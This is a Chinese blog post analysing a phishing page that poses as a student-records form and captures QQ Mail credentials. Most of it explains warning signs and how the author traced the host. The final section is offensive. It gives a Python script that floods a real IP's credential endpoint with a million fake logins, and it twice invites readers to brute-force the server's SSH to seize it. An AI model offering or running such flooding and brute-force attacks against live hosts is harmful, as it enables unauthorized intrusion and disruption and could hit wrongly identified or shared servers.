对一钓鱼网站的简单分析
钓鱼网站的一般特征
钓鱼网站一般喜欢类似http://t.cn/akWIQ3模样的短链接。
为了规避监管,钓鱼网站的服务器通常在境外或者香港,你可以查他的IP确定下。
钓鱼网站和正常网站看似没有区别,但域名和官方的域名肯定不一样,并且输入账号密码后一般会发生跳转。假如你发现跳转到了另一个长相几乎一样的页面,但域名不是刚才的域名,那基本就是钓鱼网站。记得及时修改密码。
钓鱼网站一般喜欢通过扫码的方式传播,本次的钓鱼网站经过腾讯文档伪装,在qq群进行传播,且名字起的十分可信。但是进入之后看到的确是链接而不是文档,这也是钓鱼网站常用的套路。
对钓鱼网站的简单分析
这个钓鱼链接的包装的非常好,叫学籍信息登记表,可谓是充分结合了当前时事,让人容易信服。并且借助了腾讯文档在班级群中传播,传播会非常快,并进一步增加可信度。
进入之后却不是表格,就很可疑,反而是:
学院最新《各班级学籍信息登记表》务必填写 请复制链接用浏览器打开 https://54y65b6ju78ki-1252383807.cos-website.ap-hongkong.myqcloud.com
打开所谓的学籍信息得到一个链接
https://54y65b6ju78ki-1252383807.cos-website.ap-hongkong.myqcloud.com/
首先观察域名,后缀中包含hongkong。这里说一下,香港的域名一般可以不备案的,也就是网警无法通过备案查到你的个人信息,所以这个域名要警惕下,可能不正经。
但是一般的域名不会带有地区,这个可能是服务商为提供某种某种服务生成的域名。一般的钓鱼链接爱使用短链接,这个倒是没有用短链接。举个短链接的例子:http://t.cn/akWIQ3,它就长这个样子。
后经证实,该域名是腾讯云COS服务的域名格式。
进入链接发现一个标准的钓鱼网站模板:
似乎与正常网站无异,但是为啥说他钓鱼,因为qq邮箱的域名是mail.qq.com,而该网站的域名是ap-hongkong.myqcloud.com,所以这是个妥妥的钓鱼网站。钓鱼网站通常还有一个特征,就是你输入的账号密码符合规则,他就会跳转到正确的网站去。
这里账号密码全输入123456(错误的就行)他会进入到真正的网站。可以说这个钓鱼网站的标准程度简直是教科书级的。
下图是输入账号密码后真的进行了跳转。
下图是发送密码时的数据包,一般骗子都喜欢简单化,比如他的文件叫做test.php,传输的参数用拼音命名。从包里面可以拿到了IP
根据IP反查发现是腾讯云:
顺藤摸瓜发现他的域名格式正好是腾讯云的COS域名格式
https://54y65b6ju78ki-1252383807.cos-website.ap-hongkong.myqcloud.com/ 存储桶默认域名:格式如 <BucketName-APPID>.cos.<Region>.myqcloud.com
敢用国内的云服务作案,说实话他离监狱不远了……但是假身份也是有可能的,受害者可以报警。
后面对网站进行了简单的扫描,端口几乎没有开放多余的,但有一个843额外扎眼。
经过测试是SSH服务,如果能爆破出SSH的账号密码,就可以远程登录该服务器,从而控制该服务器,大家感兴趣的可以破解下。
该网站的web服务也极其干净,似乎只有钓鱼功能。扫到的目录里也只有config.php,test.php(接收密码用),index.php(伪造的钓鱼页面)这几个页面。
我该怎么办
你如果已经输入密码了,请及时修改密码,并告知他人警惕一下。
如果你想给骗子捣乱,你可以伪造一堆账号密码开十几个线程过去让他数据库遍布错误信息。这里提供一个捣乱的python脚本(单线程的):
import requests import random url = ‘http://148.70.151.180/web/test.php‘ data = {‘u‘:‘‘,‘p‘:‘‘,‘bianhao‘:‘1‘} for i in range(1000000): data[‘u‘] = str(random.randint(100000000,99999999999)) data[‘p‘] = str(random.randint(100000,100000000)) r = requests.post(url,data=data)
如果你觉得不够狠,你可以选择破解SSH密码,彻底端了骗子老巢。